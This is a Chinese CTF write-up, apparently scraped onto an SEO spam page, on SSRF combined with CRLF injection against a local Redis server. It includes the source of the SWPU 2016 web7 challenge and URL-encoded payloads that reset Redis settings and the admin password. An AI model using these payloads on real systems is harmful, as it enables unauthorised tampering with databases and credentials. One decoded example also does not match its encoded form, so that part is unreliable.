当前位置: 首页 > news >正文

北京小程序开发平台seo技术分享

北京小程序开发平台,seo技术分享,网站建设与管理模拟试卷一,wordpress+设定首页文章目录 注入原理例题 [SWPU 2016]web7 注入原理 参考文章 应用场景是具有SSRF漏洞,结合CRLF注入 我们以redis数据库为例,当存在SSRF时我们伪造以下请求 http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%…

文章目录

    • 注入原理
    • 例题 [SWPU 2016]web7


注入原理

参考文章

应用场景是具有SSRF漏洞,结合CRLF注入
我们以redis数据库为例,当存在SSRF时我们伪造以下请求

http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0a:6379/foo

解码一下,执行过程就是将修改Redis的工作目录为 /tmp,然后修改Redis的数据库文件名为 evil,路径为默认端口的/foo

http://127.0.0.1
CONFIG SET dir /tmp
CONFIG SET dbfilename evil
:6379/foo

然后就可以执行相关操作,比如修改用户的密码
再次利用ssrf漏洞进行修改并保存

http://127.0.0.1%0d%0aset%20admin%20admin%0d%0asave%0d%0a:6379/foo

解码结果如下

http://127.0.0.1
set admin 123456
save
:6379/foo

例题 [SWPU 2016]web7

源码

#!/usr/bin/python 
# coding:utf8__author__ = 'niexinming'import cherrypy
import urllib2
import redisclass web7:@cherrypy.exposedef index(self):return "<script> window.location.href='/input';</script>"@cherrypy.exposedef input(self,url="",submit=""):file=open("index.html","r").read()reheaders=""if cherrypy.request.method=="GET":reheaders=""else:url=cherrypy.request.params["url"]submit=cherrypy.request.params["submit"]try:for x in urllib2.urlopen(url).info().headers:reheaders=reheaders+x+"<br>"except Exception,e:reheaders="错误"+str(e)for x in urllib2.urlopen(url).info().headers:reheaders=reheaders+x+"<br>"file=file.replace("<?response?>",reheaders)return file@cherrypy.exposedef login(self,password="",submit=""):pool = redis.ConnectionPool(host='127.0.0.1', port=6379)r = redis.Redis(connection_pool=pool)re=""file=open("login.html","r").read()if cherrypy.request.method=="GET":re=""else:password=cherrypy.request.params["password"]submit=cherrypy.request.params["submit"]if r.get("admin")==password:re=open("flag",'r').readline()else:re="Can't find admin:"+password+",fast fast fast....."file=file.replace("<?response?>",re)return file
cherrypy.config.update({'server.socket_host': '0.0.0.0','server.socket_port': 8080,})
cherrypy.quickstart(web7(),'/')

可以看到引入urllib2模块,题目逻辑比较清晰,就是要登录admin才能获取flag,admin的密码就在redis数据库中,然后input中使用了urllib2.open().info().headers应该是可以利用SSRF来注入redis修改admin的密码的。

我们直接修改密码(redis默认端口为6379)

http://127.0.0.1%0d%0aset%20admin%20123456%0d%0a:6379//解码如下
http://127.0.0.1
set admin 123456
:6379

在这里插入图片描述

http://www.mmbaike.com/news/73612.html

相关文章:

  • 福田附件网站建设公司智慧软文网
  • 网站源码查看百度关键词检测工具
  • 福田外贸网站建设西安小程序开发的公司
  • 地方新闻网站好坏免费代理上网网站
  • 建筑工程造价网好用的seo软件
  • 支付网站怎么做google收录提交入口
  • 网站域名注册多少钱网络宣传的方法有哪些
  • wordpress php幻灯片代码seo入门教程
  • 西安做网站费用济南网络优化网址
  • 更新网站 seo武汉整站优化
  • 网站改版提升总结苏州首页关键词优化
  • 湖北省建设网站汽车软文广告
  • wordpress中文博客主题靠谱seo外包定制
  • 网站项目申报书建设规模综合型b2b电子商务平台网站
  • seo服务理念福州排名seo公司
  • 网站中英文切换怎么做广州seo
  • 网站建设费用包括哪些方面seo内部优化包括哪些内容
  • 网站前期准备江苏网页定制
  • 余姚响应式网站建设免费私人网站建设平台
  • 整形医院网站建设广告竞价推广
  • 手机数码网站app推广平台有哪些
  • 枣庄网站建设费用西安市网站
  • 自己做网站的流程视频百度广告太多
  • 做网站页面持续优化疫情防控举措
  • 网站怎么免费做推广西安seo优化
  • 网站建设需什么免费模板
  • 网站建设与管理专业seo在线推广
  • 公司制作一个网站东莞seo网站制作报价
  • 北京比较好的网站建设公司2023年8月新闻热点事件
  • 政府网站cms廊坊seo排名